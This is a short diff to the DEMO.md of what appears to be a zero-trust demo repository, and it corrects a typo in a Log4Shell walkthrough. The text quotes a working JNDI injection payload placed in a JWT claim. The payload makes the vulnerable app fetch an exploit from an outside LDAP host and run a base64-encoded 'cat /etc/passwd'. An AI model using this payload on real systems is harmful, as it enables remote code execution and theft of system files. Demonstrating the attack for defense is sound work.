tetratelabs/zta-demo-2022/DEMO.md

   08:23:49.537 [qtp1316061703-16] INFO  io.tetrate.log4shell.vulnerable.GreetingsServlet - user resolved to: pwned!
   ```

-At this point, the vulnerable application has processed the mailitious `${jndi:ldap://log4shell:1389/exec/Y2F0IC9ldGMvcGFzc3dkCg==}`
+At this point, the vulnerable application has processed the malicious `${jndi:ldap://log4shell:1389/exec/Y2F0IC9ldGMvcGFzc3dkCg==}`
 payload in the `name` claim of the JWT token, downloaded the exploit from `log4shell:1389`, and executed the `cat /etc/passwd` command
 that comes base64-encoded in the payload.